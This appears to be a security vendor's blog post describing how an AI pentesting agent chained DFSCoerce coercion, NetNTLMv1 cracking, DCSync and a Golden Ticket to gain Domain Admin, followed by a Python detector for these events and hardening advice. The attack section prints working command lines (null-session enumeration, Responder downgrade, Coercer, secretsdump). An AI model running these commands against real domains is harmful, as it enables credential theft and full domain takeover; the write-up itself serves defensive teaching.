
Active Directory Takeover: Low-Priv to Domain Admin

How an AI security engineer chained DFSCoerce, NetNTLMv1, and DCSync to go from one low-privileged account to Domain Admin, live and fully anonymised.

Jun 2, 2026 · Breachline Labs

On a recent UK engagement, Nebula started from a single low-privileged domain account with no administrative rights and finished with the keys to the entire Active Directory forest. It happened live, on production, without a destructive action, and every step was backed by captured evidence. This post walks the chain it used. The client, domain, hosts, IP addresses, and account names are fully anonymised; only the techniques and the public references are real.

The point is not that these individual weaknesses are new. Each one is well documented. The point is that a scanner sees them as a handful of medium findings, while an attacker (or an AI that reasons like one) chains them into total compromise in under a minute.

Background

Active Directory is the identity backbone of most Windows estates. A "Domain Admin" can read every secret, log in to every host, and persist indefinitely. The shortest path to that level rarely runs through a single critical CVE. It runs through a sequence of small misconfigurations that are individually low risk and collectively fatal.

Three of those misconfigurations did the work here:

  • Authentication coercion is reachable. A low-privileged account can force a domain controller to authenticate to a machine the attacker controls (see MITRE ATT&CK T1187, Forced Authentication).
  • NetNTLMv1 is still accepted. The response is DES over the server challenge with keys derived directly from the NT hash, so a captured NetNTLMv1 response can be cracked back to the original NT hash without ever guessing the password.
  • SMB signing is not enforced, so the same coerced authentication could also be relayed, and the krbtgt account password has not rotated in years, which keeps forged tickets valid for a very long time.

How it works

The chain ran in six steps. Tool output below is representative and masked.

Step | Technique | What it achieved
1. Foothold | Initial Access | A single low-privileged domain account, no admin rights
2. Enumeration | T1087 | Anonymous SMB null session listed the full domain user directory, with descriptions that flagged the privileged accounts
3. Coercion | T1187 | DFSCoerce (MS-DFSNM) forced the domain controller machine account to authenticate to an attacker host
4. Capture and crack | T1110.002 | The coerced NetNTLMv1 response was cracked to recover the DC machine-account NT hash
5. DCSync | T1003.006 | Pass-the-hash as the DC account replicated every domain hash, including krbtgt
6. Golden Ticket | T1558.001 | A ticket forged from the krbtgt key was validated live against the production DC, then deleted

The enumeration step required no credentials at all:

nxc smb <dc> -u '' -p '' --users
# returns the full domain user list, last-password-set, and descriptions

The coercion and DCSync steps turned a low-privileged user into a domain replica:

# on the attacker host, listen for the coerced authentication and force the NetNTLMv1 downgrade (static challenge, no ESS)
# responder -I <iface> --lm --disable-ess
coercer coerce -t <dc> -l <attacker> -u <low-priv> -p <password> -d <domain>   # force DC auth over MS-DFSNM, capture NetNTLMv1
# crack the NetNTLMv1 response offline to the DC machine-account NT hash
impacket-secretsdump -hashes :<dc-hash> '<domain>/<dc>$@<dc>' -just-dc   # DCSync as the DC machine account
# dumps every account hash, including krbtgt

With the krbtgt key in hand, a Golden Ticket, a TGT forged offline and signed with that key, grants any identity in the domain. It was forged offline, validated against the live DC for full administrative share access, and removed afterward per the engagement cleanup rules.
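The detection a defender wants for steps 4 and 5, as an added example that is not code from the post or from Nebula: flag Security event 4624 logons where the NTLM sub-package is V1 (proof the downgrade is accepted), and flag event 4662 replication requests (DCSync) by where the session came from rather than by account name. The second point matters for this chain in particular: step 5 replicated as the DC's own machine account, which the common "ignore DC$ accounts" rule would whitelist. 4662 carries no network address, so the example joins it to the 4624 that created the session (4624.TargetLogonId == 4662.SubjectLogonId). The event records, host names and IP addresses below are constructed; the replication-right GUIDs are the real AD values.

```python
"""Detect NetNTLMv1 acceptance (4624) and DCSync from a non-DC host (4662).

Added example, not Breachline's or Nebula's code. Event dicts use the field
names of the Windows Security log XML schema; the records themselves are
constructed for the demo.
"""
from dataclasses import dataclass

# Control access rights a DCSync needs (real Active Directory GUIDs).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = (DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL)


@dataclass(frozen=True)
class Finding:
    event_id: int
    account: str
    source_ip: str
    reason: str


def ntlmv1_logons(events):
    """4624 events whose 'Package Name (NTLM only)' field is NTLM V1."""
    return [
        Finding(4624, ev["TargetUserName"], ev.get("IpAddress", "-"),
                "NetNTLMv1 accepted; response is crackable to the NT hash")
        for ev in events
        if ev["EventID"] == 4624
        and ev.get("AuthenticationPackageName") == "NTLM"
        and ev.get("LmPackageName") == "NTLM V1"
    ]


def dcsync_attempts(events, dc_ips):
    """4662 replication requests whose logon session came from a non-DC address.

    Judge the source IP, not the account: a DC machine account used via
    pass-the-hash from an attacker host is still a DCSync.
    """
    sessions = {ev["TargetLogonId"]: ev for ev in events if ev["EventID"] == 4624}
    findings = []
    for ev in events:
        if ev["EventID"] != 4662:
            continue
        props = ev.get("Properties", "").lower()
        if not any(guid in props for guid in REPLICATION_GUIDS):
            continue
        logon = sessions.get(ev["SubjectLogonId"])
        src = logon["IpAddress"] if logon else "unknown"
        if src in dc_ips:
            continue  # ordinary DC-to-DC replication
        findings.append(Finding(4662, ev["SubjectUserName"], src,
                                "replication rights exercised from a non-DC host (DCSync)"))
    return findings


# Constructed sample: two DCs, one help-desk workstation that is also the attacker's foothold.
DC_IPS = {"10.0.0.10", "10.0.0.11"}  # hypothetical DC01 and DC02
SAMPLE_EVENTS = [
    # Step 2: the null session shows up as an anonymous network logon.
    {"EventID": 4624, "TargetUserName": "ANONYMOUS LOGON", "TargetLogonId": "0x2f10",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "-",
     "IpAddress": "10.0.3.20"},
    # A workstation still negotiating NTLMv1: the downgrade is accepted by the DC.
    {"EventID": 4624, "TargetUserName": "hd.jones", "TargetLogonId": "0x2f55",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1",
     "IpAddress": "10.0.3.20"},
    # Normal replication: DC02$ logs on from a DC address and pulls changes.
    {"EventID": 4624, "TargetUserName": "DC02$", "TargetLogonId": "0x5a1",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "LmPackageName": "-",
     "IpAddress": "10.0.0.11"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectLogonId": "0x5a1",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Step 5: pass-the-hash as DC01$ from the foothold host, then DCSync.
    {"EventID": 4624, "TargetUserName": "DC01$", "TargetLogonId": "0x3e7a1",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "IpAddress": "10.0.3.20"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x3e7a1",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def run_sample():
    """Run both detections over the constructed events; returns the findings."""
    return ntlmv1_logons(SAMPLE_EVENTS) + dcsync_attempts(SAMPLE_EVENTS, DC_IPS)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

On the sample, the NTLMv1 logon by hd.jones and the DC01$ replication from 10.0.3.20 are flagged; DC02$ replicating from a DC address is not. Event 4662 is only emitted when the SACL on the domain head audits control access, so enable that auditing before relying on the second rule.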

Why it matters

No single finding here would top a scanner report. Coercion surfaces, NetNTLMv1, missing SMB signing, and a stale krbtgt are routine "medium" items that sit in backlogs for months. Chained, they are a complete path from a help-desk-tier account to forest-wide control.

This is the gap between "the scan passed" and "we are safe." Signature tools enumerate issues. They do not reason about how those issues combine, so the most dangerous attack path, the one a real adversary actually walks, is the one they never surface.

What to do

These are concrete, high-impact hardening steps for the chain above.

  • Block coercion. Apply the mitigations in Microsoft advisory ADV210003 (written for the PetitPotam/MS-EFSR path) and cover the MS-DFSNM path that DFSCoerce uses with RPC filters or the NTLM restrictions the advisory describes on the domain controllers, since no single patch closes every coercion interface. Restrict which accounts can reach those RPC interfaces.
  • Kill NetNTLMv1. Set the LAN Manager authentication level (LmCompatibilityLevel) to 5, which sends NTLMv2 only and refuses LM and NTLMv1, on domain controllers and members; first check the Security log for 4624 events still showing NTLM V1 so you know which legacy clients will break. It is a decades-old downgrade that should not exist on a modern domain.
  • Enforce SMB signing on domain controllers and member servers so coerced authentication cannot be relayed. Signing does not stop the offline crack of a captured NetNTLMv1 response, which is why the previous item is not optional.
  • Rotate krbtgt twice, then put it on a schedule. A krbtgt that has not changed in years means every previously forged ticket may still work, because the KDC still honours tickets under the previous key until the second reset. Wait for replication and at least one maximum ticket lifetime (10 hours by default) between the two resets so legitimate sessions renew cleanly.
  • Deploy LAPS and tier your admin accounts so a single foothold cannot pivot estate-wide.
  • Test the chain, not the checklist. Validate that these controls actually break the path end to end, rather than confirming each box in isolation.

How Breachline helps

Nebula is an AI security engineer that tests the full stack the way an attacker does. It does not just list the coercion surface and the stale krbtgt as separate findings. It chains them, proves the result with a working, non-destructive exploit in an isolated sandbox, and reports the exact path with reproduction steps mapped to MITRE ATT&CK. Then it retests after you fix it. Continuous, scope-locked, and human-approved for anything risky.

Takeaways

  • Domain takeover is usually a chain of "medium" findings, not one critical CVE.
  • Coercion plus NetNTLMv1 plus weak SMB signing plus a stale krbtgt is a full path to Domain Admin.
  • Test how weaknesses combine, and prove the fix actually breaks the path.
